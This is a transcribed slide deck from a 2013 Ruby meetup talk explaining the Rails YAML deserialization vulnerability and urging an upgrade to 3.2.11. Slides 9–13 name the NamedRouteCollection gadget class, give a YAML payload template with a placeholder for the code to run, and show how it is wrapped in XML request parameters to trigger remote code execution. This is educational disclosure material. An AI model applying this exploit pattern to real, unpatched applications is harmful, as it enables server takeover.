Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Rails YAML vuln.

Rails YAML vuln.

Quick presentation on the YAML vuln and the impact on a Rails application.
Made at : http://rubybdx.org/


Damian Le Nouaille

February 06, 2013


  1. YAML in Ruby

  2. “This is a VULN” “No, this is a feature.” YAML

    allows us to represent ruby objects directly
  3. YAML deserialize blobs : !ruby/object:MyClass MyClass.allocate will execute :

  4. Example (really simplistic) (this not real code, but a vulnerable

  5. Normal : Hacked :

  6. Normal result: Hacked result:

  7. YAML creates objects. With code execution on “[]=” (and more

    methods) Is there a Rails class with that ?
  8. None
  9. When the fun begin. ActionDispatch::Routing::RouteSet::NamedRouteCollection https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/ routing/route_set.rb#L113 Allows alias “[]=”

    on “add”
  10. Back to Rails. Let’s create a YAML string : ---

    !ruby/ hash:ActionController::Routing::RouteSet::NamedRouteCollection ? #{encoded_payload} : !ruby/struct defaults: :action: create :controller: foos required_parts: [] requirements: :action: create :controller: foos segment_keys: - :format
  11. Inject that YAML in XML <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml.html_escape}</exploit>

  12. Send the XML to the app

  13. Rails will deserialize the params[], the XML, the YAML, and

    will execute the payload.
  14. Rails will deserialize the params[], the XML, the YAML, and

    will execute the payload. ... without 500 errors.
  15. None
  16. Demo on 3.2.10 simple scaffold app.

  17. None
  18. Demo on 3.2.11

  19. None
  20. NOT a Rails problem. It’s a YAML feature. Ok ...

    Rails problem too. UPGRADE to 3.2.11
  21. Credit photo/text http://rubysource.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-vulnerability/ http://www.kalzumeus.com/2013/01/31/what-the-rails-security-issue-means-for-your-startup/ http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html http://ronin-ruby.github.com/blog/2013/01/28/new-rails-poc.html http://lesjoiesducode.tumblr.com/ Merci. @DAMLN